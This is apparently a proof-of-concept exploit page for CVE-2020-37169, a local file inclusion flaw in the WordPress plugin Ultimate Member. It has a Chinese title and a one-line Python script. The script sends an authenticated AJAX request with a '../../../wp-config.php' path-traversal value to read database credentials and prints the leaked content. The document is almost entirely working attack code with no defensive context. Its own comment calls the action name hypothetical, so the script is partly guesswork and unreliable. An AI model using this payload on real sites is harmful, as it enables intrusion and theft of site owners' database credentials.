CVE-2020-37169 WordPress插件Ultimate Member本地文件包含漏洞

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # The action triggers the upgrade function in class-admin-upgrade.php action = "um_do_ajax_upgrade" # Hypothetical action name based on plugin structure # Attacker's session cookie (requires authentication, PR:L) cookies = { "wordpress_logged_in_example": "attacker_session_cookie_value" } # Malicious payload including a sensitive file using path traversal # Attempting to include wp-config.php to leak database credentials payload_data = { "action": action, "pack": "../../../wp-config.php" } try: response = requests.post(target_url, data=payload_data, cookies=cookies) # Check if the response contains indicators of success (e.g., DB_PASSWORD) if response.status_code == 200 and "DB_PASSWORD" in response.text: print("[+] Vulnerability exploited successfully!") print("[+] Leaked content:") print(response.text[:500]) # Print first 500 chars of response else: print("[-] Exploit failed or target not vulnerable.") print(f"Status Code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")